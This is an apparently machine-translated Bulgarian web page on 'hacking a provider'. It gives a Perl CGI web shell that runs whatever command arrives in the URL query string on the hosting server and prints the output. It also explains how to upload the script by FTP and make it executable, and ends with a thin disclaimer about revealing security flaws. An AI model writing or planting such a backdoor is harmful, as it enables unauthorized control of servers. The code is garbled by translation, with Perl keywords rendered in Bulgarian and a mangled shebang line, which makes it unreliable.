хакване доставчик
Вие трябва да напишете Perl скрипт за управление на сървъра на вашия доставчик на услуги (ако приемем, че като WWW-сървър е инсталиран във вашия потопите Apacheperl: най-популярният вариант). Не се страхувайте да го напиша много просто. Okryvat бележника известен още като notepad.exe :) и текст, който да бъде гравирано:
#! / ЮЕсАр / хамбар / Perl
печат "Content-Type: текст / htmlnn";
$ Cmd = $ ENV; # Присвоява на променливата "CMD" аргумент на скрипта.
@ Tmp = разделяне (/% 20 /, $ CMD); # Създаване на масив от "ПТУ", която държи прекъснатите линии на пропуски от променлива в "CMD".
$ Cmd = присъединят ( "", @ TMP); # Осъвременяването на променливата "CMD", заместване на всички пространства кодирани браузър (20%) в конвенционалните.
@ Изход = `$ cmd`; # Изпълнете командата "CMD" на на сървъра и напишете това води до множество "изход".
печат "
п ";
foreach (@output) печат "$ _"; # Отпечатване на резултата на екрана.
>Запазване на това чудо под името "test.pl" и го zaley към сървъра в в ASCII режим (в противен случай тя няма да работи нищо). За да преминете към ASCII-режим, изпраща команда Ftp сървър: "TYPE А".
Толкова е просто. Сценарият е инструкция, която се предава чрез QUERY_STRING. Но, преди да тествате сценария, за да го направите изпълним. За да направите това, да промените атрибутите му за "755" (ако не можете да намерите къде да го промените, изпращане на команди "на сайта коригират 755 test.pl" на Ftp сървър.
VHIMAHIE. , Целта на тази статия - за да се покаже ppovaydepam възможно недостатъци на техните системи за безопасност и тяхното внимание ppivlech ПРОБЛЕМА nesanktsionipovannogo достъп. Avtop не носи отговорност за каквито и да било последици, причинени от tvopcheskim matepiala разбиране на читателите.
Сайта е създаден в uCoz система